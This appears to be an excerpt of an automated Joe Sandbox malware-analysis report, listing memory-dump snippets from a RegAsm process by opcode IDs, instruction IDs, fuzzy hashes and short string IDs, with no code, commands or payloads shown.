                                              • Instruction ID: 73a91be544d4a506f66f709c04eced109b2baf0fe93449a0229bb4c2147f9e9d
                                              • Opcode Fuzzy Hash: 194fe425d84ffae13d604075df710e4082725dab6d760166d23e3175e7f58bc7
                                              • Instruction Fuzzy Hash: ABA18F20B19A0D4FEBA89B58846177977D1FF99300F6542BED44EC72E3CE29ED458740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: ca69a8ec4012d5f4ba3c74d00fc1e423cc3b0602e6429a6007ece8ea47bbbd32
                                              • Instruction ID: 9e5c6cb37930108c3bd077fa165a161d0b4e450e42dde032e121caa3426b495e
                                              • Opcode Fuzzy Hash: ca69a8ec4012d5f4ba3c74d00fc1e423cc3b0602e6429a6007ece8ea47bbbd32
                                              • Instruction Fuzzy Hash: 25A17E20B19A0D4FEBA89B58846177977D1FF9C300F6542BEE44EC72E7CE29E9468740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: 214bc5fd298ebeaa114d5465162cf900d07abd1a52fdfc7b7e689237ec4b414c
                                              • Instruction ID: 16e89d45890749cadb5f7c1bafa0e5e468634a2230b770489432d2fc762d4259
                                              • Opcode Fuzzy Hash: 214bc5fd298ebeaa114d5465162cf900d07abd1a52fdfc7b7e689237ec4b414c
                                              • Instruction Fuzzy Hash: EFA17E20B19A0D4FEBA89B5C846177977D1EF99300F6542BAE44EC72E7CE28ED458740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: cbd66e0382120fc9d95994e2cdc9ba85f4ec469e1205dc303229b98cc9c46b73
                                              • Instruction ID: 0ce0ac4684ed50ce58f2c0f3188950cd84f1cb79db21ee96c0b7fc21b873a04a
                                              • Opcode Fuzzy Hash: cbd66e0382120fc9d95994e2cdc9ba85f4ec469e1205dc303229b98cc9c46b73
                                              • Instruction Fuzzy Hash: D3A16F20B19A0D4FEB689B58846177977D1FF9C300F5542BAE44EC72E7CE29E9458740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: 3478729688ca5c76d8fb7dcf7eca25cb4774165caeeea234931f0bb235c03c82
                                              • Instruction ID: 879b1fc6b1e576ab916f29f25890b18e072f2f5ae72fa7df7444dca49daeaf12
                                              • Opcode Fuzzy Hash: 3478729688ca5c76d8fb7dcf7eca25cb4774165caeeea234931f0bb235c03c82
                                              • Instruction Fuzzy Hash: 77A17F20B19A0D4FEBA89B98846177977D1FF9D300F6542BAD44EC72E7CE28ED468740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: 7c0fdf1cbc607a4dc916f142d9d799a4cd2ae3b246601b4c474528715dd49276
                                              • Instruction ID: 481cb0fc40b658013852b999ebd95350dcb1c7ade95e670946eeea593c993c95
                                              • Opcode Fuzzy Hash: 7c0fdf1cbc607a4dc916f142d9d799a4cd2ae3b246601b4c474528715dd49276
                                              • Instruction Fuzzy Hash: 36A16E20B19A0D4FEBA89B5C846177977D1FF9C300F6542BAE44EC72E7CE28E9468740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9S
                                              • API String ID: 0-4182263450
                                              • Opcode ID: f0f65bb59146d2ff6188262659f902483172b29388e41c72acf6916e6d94279c
                                              • Instruction ID: eaf7ac7ce7ca3e16bea3059400bd96952a13dae05e366433596f2652fe962023
                                              • Opcode Fuzzy Hash: f0f65bb59146d2ff6188262659f902483172b29388e41c72acf6916e6d94279c
                                              • Instruction Fuzzy Hash: 93A16E20B19A0D4FEBA89B58846177977D1FF9C300F6542BAE44EC72E7CE29ED458740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 7S
                                              • API String ID: 0-1182333179
                                              • Opcode ID: 2b598e27aed5a5376b17ce91983e80e1db11acd742a697ead77132f7dcf809c3
                                              • Instruction ID: 96ada23a3977e7dd2e05af47a533bd36fa4b9d5a4322cffb1855ea0faa5c08b9
                                              • Opcode Fuzzy Hash: 2b598e27aed5a5376b17ce91983e80e1db11acd742a697ead77132f7dcf809c3
                                              • Instruction Fuzzy Hash: 5F814E30A19A0D8FDB98EF58C450BA9B7E1FF99340F5142A9D40DCB2A6DE35ED81CB40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 7S
                                              • API String ID: 0-1182333179
                                              • Opcode ID: a82747b5decb4720a43a631d51d702d70b8e1b4704443968ac1f1510c98ab59d
                                              • Instruction ID: ea67b014b78f09a1165a9fb6a09f4e2dc3b36b0bc84c6910ae89cfba98873521
                                              • Opcode Fuzzy Hash: a82747b5decb4720a43a631d51d702d70b8e1b4704443968ac1f1510c98ab59d
                                              • Instruction Fuzzy Hash: 86714E30A19A0D8FDB99EF58C450BA977E1FF99340F5142AAD40DCB2A6DA35A981CB00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b890000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0G
                                              • API String ID: 0-2227637342
                                              • Opcode ID: 41c35e5b849eccd60fe265f2e650619cc71be12e8dd0f3780b5d849d49ceb8c1
                                              • Instruction ID: 672d924ed0f5574e2fbae66dc69a1f45b28fedcca56d1becdbd3275b3ce73342
                                              • Opcode Fuzzy Hash: 41c35e5b849eccd60fe265f2e650619cc71be12e8dd0f3780b5d849d49ceb8c1
                                              • Instruction Fuzzy Hash: E4618621B1E94D5FEFA8FBA894756BC7AD2EF9D700B560179E10EC32E6CE246D018341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p:S
                                              • API String ID: 0-2993042621
                                              • Opcode ID: 5d0388b4c1ff6979889b18ac64d9994f69af210c9ad0bcb64e67497d16cc402f
                                              • Instruction ID: 296cf708a6fb11d916241b717e317dc9e9e87d0379729137ecebcc0013cbc3e3
                                              • Opcode Fuzzy Hash: 5d0388b4c1ff6979889b18ac64d9994f69af210c9ad0bcb64e67497d16cc402f
                                              • Instruction Fuzzy Hash: 6A417C3071DA4D8FDB95EB6C94A4A297BE1EF9D700B0506AEE04DC72B2CE25AD418742
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: cZ
                                              • API String ID: 0-559879186
                                              • Opcode ID: 2a7838498a0ad13f994839692575669f4009163d380debfcbeade2998768f610
                                              • Instruction ID: 8ba481e82173e8260c0eddff8a4fbd68d07e0df29612d620817c233814da5af9
                                              • Opcode Fuzzy Hash: 2a7838498a0ad13f994839692575669f4009163d380debfcbeade2998768f610
                                              • Instruction Fuzzy Hash: FE41E331A0E68D4FDB59EB7894255E97BA1FF9A314B0501BBE04DC7193DE24A802C740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '
                                              • API String ID: 0-3744524632
                                              • Opcode ID: cc5f9ecd76e90a5d9783a37fba2f4d030a97e9f9fa73352fcbfe379a45dd08ae
                                              • Instruction ID: 678976420567018b1732b4da6a0d72906cc73be0513b320146776f6fd203ed2e
                                              • Opcode Fuzzy Hash: cc5f9ecd76e90a5d9783a37fba2f4d030a97e9f9fa73352fcbfe379a45dd08ae
                                              • Instruction Fuzzy Hash: 4D41A230719A8E5FDB98EF68C4616E977A1FF98300F1106ABE419C7296DB35E941C740
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3+
                                              • API String ID: 0-3169192172
                                              • Opcode ID: e389338a68de1cb0d07e3f164df4f90893c432962f5294f03a16a0942861ffa1
                                              • Instruction ID: e05b09324c9dd73f99a6677efa005c8a1646bc3cb0323fd50f5132478a145e31
                                              • Opcode Fuzzy Hash: e389338a68de1cb0d07e3f164df4f90893c432962f5294f03a16a0942861ffa1
                                              • Instruction Fuzzy Hash: B431B03160EA885FCB55DF58D8649E97BE0FF9D710F0502BFE08DC3262CA689845C782
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: cZ
                                              • API String ID: 0-559879186
                                              • Opcode ID: e8e3ccc9049918160931882d2b83cf4bb1f903370d25ae032d50f15e8548eef8
                                              • Instruction ID: 42d12e781f1546847d49ac46acbb8dc743be05be82e30653c4a51a9842c31777
                                              • Opcode Fuzzy Hash: e8e3ccc9049918160931882d2b83cf4bb1f903370d25ae032d50f15e8548eef8
                                              • Instruction Fuzzy Hash: 9621E531B1EB490BD768EB6C58655B676D1EBCD710F05027FE48DC3292DD24A9018381
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: kH_^
                                              • API String ID: 0-35278350
                                              • Opcode ID: de4c7ec373d97627c93fc6de882b40d4aacb4bd085fb7c4060c4a4851d12169d
                                              • Instruction ID: 01de597fa4733f9ae98c8a9f5b7cdd2e657b39c812890bd6062a5926b3850475
                                              • Opcode Fuzzy Hash: de4c7ec373d97627c93fc6de882b40d4aacb4bd085fb7c4060c4a4851d12169d
                                              • Instruction Fuzzy Hash: D7318130B1A61A8FE755FB788865BA977D2FF8D308F110475E019C72EADE38AD428741
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: cZ
                                              • API String ID: 0-559879186
                                              • Opcode ID: 21657f948d00257fdcbb0c9eca277a9482de5dfc93e39ba88a26b30930f32781
                                              • Instruction ID: e958a0f68b42353a93302470aa4a5bfd99d2a06c24d40a4ebe39eec8e84039ba
                                              • Opcode Fuzzy Hash: 21657f948d00257fdcbb0c9eca277a9482de5dfc93e39ba88a26b30930f32781
                                              • Instruction Fuzzy Hash: 8A21C531B1DA0D4BE76CEB6CA4656B676D1EBCD714F01037FE44EC3292DD24A9028685
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (:S
                                              • API String ID: 0-1388035623
                                              • Opcode ID: 9846b67d55ab1da98b58958977c3eb8a48bd3a8dd0c493de9c5b2d58a72e913f
                                              • Instruction ID: 9873f02033ba6f9c4b164c94cf780a3d1f258d1d6675cb898125ca285c447718
                                              • Opcode Fuzzy Hash: 9846b67d55ab1da98b58958977c3eb8a48bd3a8dd0c493de9c5b2d58a72e913f
                                              • Instruction Fuzzy Hash: 7011B131B1AD0D5FDBA8EBAC946566473D2FF9D30172142BAE00DC72B6DE25EC418780
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M
                                              • API String ID: 0-3664761504
                                              • Opcode ID: 9b9b218c2c7752bc860ec2ca343721bcc4a63e961906a52c78993bd104e152f3
                                              • Instruction ID: 5fd750212cadbc3721dfb0d89c1a8431916e7e363bb3ae8276886ed3e495566a
                                              • Opcode Fuzzy Hash: 9b9b218c2c7752bc860ec2ca343721bcc4a63e961906a52c78993bd104e152f3
                                              • Instruction Fuzzy Hash: 5AF0A02060E3C44FCB169A3588284507F60AF6721034A42EFC046CF1A3EA188885C701
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M
                                              • API String ID: 0-3664761504
                                              • Opcode ID: a4b5ed1017e151204b25b7a1e36313e0b09c85e720874931166ca5f9b438512d
                                              • Instruction ID: ea4b6a0df948af313ae5bcdccae295331227e1d301558ad6cd5b9da050b553d8
                                              • Opcode Fuzzy Hash: a4b5ed1017e151204b25b7a1e36313e0b09c85e720874931166ca5f9b438512d
                                              • Instruction Fuzzy Hash: 95F0E52060F3C44FC71A9B3588294447F60EF6720134A42EFC046CF1A3DA2DC8C5C701
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M
                                              • API String ID: 0-3664761504
                                              • Opcode ID: 683e497db4ea36045e0ec8ff703087236649c6f53d113e34d5a2da7e8d5b88a0
                                              • Instruction ID: 034d274607239b138d2c15979f4a96575a65c1812ef5faa4df7cc73891c8407b
                                              • Opcode Fuzzy Hash: 683e497db4ea36045e0ec8ff703087236649c6f53d113e34d5a2da7e8d5b88a0
                                              • Instruction Fuzzy Hash: 3DE0923060E3C44FCB1AEB3488694547F60EE6720174A42EFC445CF1A3EA2DC889C701
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: I
                                              • API String ID: 0-3707901625
                                              • Opcode ID: b1f929696428657730337afe17bbcefd939efaf737032ade9c037e6497d0f6c4
                                              • Instruction ID: ea2f878b509c0b43580cfc54c90b7cca310874929745ee04ac2622ebd4ef1adc
                                              • Opcode Fuzzy Hash: b1f929696428657730337afe17bbcefd939efaf737032ade9c037e6497d0f6c4
                                              • Instruction Fuzzy Hash: 19E09A6150F3C44FCB4AAB7588698043FA0EF6B21078F42EEC086CF1B3E62D8849C701
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: I
                                              • API String ID: 0-3707901625
                                              • Opcode ID: 42a75a38d25365893e7bb94cdd11f2fb5d3d7f4580ba88b1c2a044f3dd0883bb
                                              • Instruction ID: a4539e5468b19f37c8a00fc6e725f61410698ca8e9e657bed30df25800e6ccf3
                                              • Opcode Fuzzy Hash: 42a75a38d25365893e7bb94cdd11f2fb5d3d7f4580ba88b1c2a044f3dd0883bb
                                              • Instruction Fuzzy Hash: C2E0926154F3C04FCB46EB3588658543FA0AE6735074A40EFC086CF1B3E52D8989C711
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: I
                                              • API String ID: 0-3707901625
                                              • Opcode ID: 14b6632a73c32fa16b6609a1bf59138cf36c1f24a65550e5445c8f1685cc8797
                                              • Instruction ID: 37577e346d1095e2217befade875cf919d150b04c28b403dfa7c66b43bc40af4
                                              • Opcode Fuzzy Hash: 14b6632a73c32fa16b6609a1bf59138cf36c1f24a65550e5445c8f1685cc8797
                                              • Instruction Fuzzy Hash: FAE01A7154B3C44FCB16AB7588659443FB0EF6B65078A41EEC086CB1B3E62D988AC701
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3+
                                              • API String ID: 0-3169192172
                                              • Opcode ID: a202265c3271abfb9949958b76d3eea0d773125045d114bda6149b83cd335fe7
                                              • Instruction ID: 248bf01f265f5b06fce7de984a6b001cf426f1e454d3a0dd2139c97c1cc05590
                                              • Opcode Fuzzy Hash: a202265c3271abfb9949958b76d3eea0d773125045d114bda6149b83cd335fe7
                                              • Instruction Fuzzy Hash: B0D0C230915E4C2BCB20FB1888199FB3AD5EBAC715F02032BB40CE3220CE24A50487C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `"S
                                              • API String ID: 0-3777030757
                                              • Opcode ID: a10db04e9f23613364466b7d8fa0fd00b6c571d17d6ee883cdd2938a6839ce95
                                              • Instruction ID: 71cc1ca04a4d48166741fec1c2de82b67ba85806bce0a20c83a59f38f6504fea
                                              • Opcode Fuzzy Hash: a10db04e9f23613364466b7d8fa0fd00b6c571d17d6ee883cdd2938a6839ce95
                                              • Instruction Fuzzy Hash:
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: cZ
                                              • API String ID: 0-559879186
                                              • Opcode ID: a0ef8d02e8bfb422d19f757848aee994ce82f53311dc78adaca9ea2379914fb0
                                              • Instruction ID: 423a64b2a7034099999f3c5fe1233fe996107dc53857f75544ddba34a9c966c7
                                              • Opcode Fuzzy Hash: a0ef8d02e8bfb422d19f757848aee994ce82f53311dc78adaca9ea2379914fb0
                                              • Instruction Fuzzy Hash:
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4142886204.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b970000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 74b1ca76d0639fcfefdd5ebf1f7c0c89f27a7c3b8ce35ebca3dc3c518cd5de7b
                                              • Instruction ID: 90f9c2b50332340c91b0ac3b59452cdd11140b63ff8ea48e0813a8a15bcc05bb
                                              • Opcode Fuzzy Hash: 74b1ca76d0639fcfefdd5ebf1f7c0c89f27a7c3b8ce35ebca3dc3c518cd5de7b
                                              • Instruction Fuzzy Hash: 2F02C921B2ED2F1FF7B6A7AC10B527913C2EF99255B26017AD40DC72F3DD18AA074281
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0bf60118cde19a56fb2519050cc1896a353cfb34390aaf17a58b448e6bfe96d2
                                              • Instruction ID: 78bf6cbfeab41f0bcd1f9c867d95dc7b9d5c46d4acce86fe9452dba875093360
                                              • Opcode Fuzzy Hash: 0bf60118cde19a56fb2519050cc1896a353cfb34390aaf17a58b448e6bfe96d2
                                              • Instruction Fuzzy Hash: 3402F430B1DA0A4FE769DB1884A5A7973D1FF98340F4547BEE48EC71A6DE24BD028781
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09d3135602a36d4fd265a30ad8d17ea00684f946ba15147d309105ca2765bbef
                                              • Instruction ID: e6c102505efdb82668db783a893f377c29673d7c81e4c29541d8232ef91ea5d0
                                              • Opcode Fuzzy Hash: 09d3135602a36d4fd265a30ad8d17ea00684f946ba15147d309105ca2765bbef
                                              • Instruction Fuzzy Hash: 8DE1D231B1DA4E8FDB68DB5894A1675B3E1FF98310F11037AD45ECB2A6DE24F8428781
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 90c00b032fdccf85e80ebde38630621917892b48d87574043a8c8d69b09a2638
                                              • Instruction ID: 04f684def42cdd2017deab64437321d0c0bb591e0ed04def9a0a2e1d9d8e73a1
                                              • Opcode Fuzzy Hash: 90c00b032fdccf85e80ebde38630621917892b48d87574043a8c8d69b09a2638
                                              • Instruction Fuzzy Hash: E6E18030719A0D8FEBA8EB6CC4A5B6437D1FF59301B1505B9E44ECB2B2DA29ED41CB41
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4142886204.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b970000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba01466845df5844dadd1973bccd36f90d55ccb80b8ccedbc4b65427d2183324
                                              • Instruction ID: 8a837d7469f5da6ead6b3039263b9473b65ab1bfdf99565d18f0008378dff157
                                              • Opcode Fuzzy Hash: ba01466845df5844dadd1973bccd36f90d55ccb80b8ccedbc4b65427d2183324
                                              • Instruction Fuzzy Hash: C3C13F61F2ED0F5AF9BAA7AC00B527C02D3EFD8650B664575D40DD32E2ED1DAB038251
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7ba36827a8555347f03a20505f42a6e5ce99f0e6951c716cc2ee522024234b06
                                              • Instruction ID: fcabd8e8420ed9e2a8cb2a3c0329cfd3beffa29035fe49febd0fb79e068ecd4b
                                              • Opcode Fuzzy Hash: 7ba36827a8555347f03a20505f42a6e5ce99f0e6951c716cc2ee522024234b06
                                              • Instruction Fuzzy Hash: 94D1D930609A8D4FEB68EF28D8557F977D1FF59310F04426EE85DC7291CB7499418B82
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a36cde3618c66f4446cbaf764302b433928ba60892db1ad1527998378547575d
                                              • Instruction ID: 2e90619a8fab59a36265e50e52d09c6000d9e62ab9258fb695170d8f2a257762
                                              • Opcode Fuzzy Hash: a36cde3618c66f4446cbaf764302b433928ba60892db1ad1527998378547575d
                                              • Instruction Fuzzy Hash: 4CD18A71B1994D8FDFA8EF68C8A5AA977E1FF9C340F5501B9E40DC72A6CE25E8018740
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.4141104304.00007FFD9B8CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CB000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ffd9b8cb000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d39cfdab9eacb0c35c56c9ae096826ba8c27970ffd672198e22bce20cdf442d0
                                              • Instruction ID: d6e496ff0f00c62b5a71ce168e997ff45af4c171c400eba4517379601f4f8d67
                                              • Opcode Fuzzy Hash: d39cfdab9eacb0c35c56c9ae096826ba8c27970ffd672198e22bce20cdf442d0
                                              • Instruction Fuzzy Hash: 06B15722B0EE4E0FE7A8976C98656B577D1EFD936071503BBD04EC71D6EE18AD428340
                                              Memory Dump Source
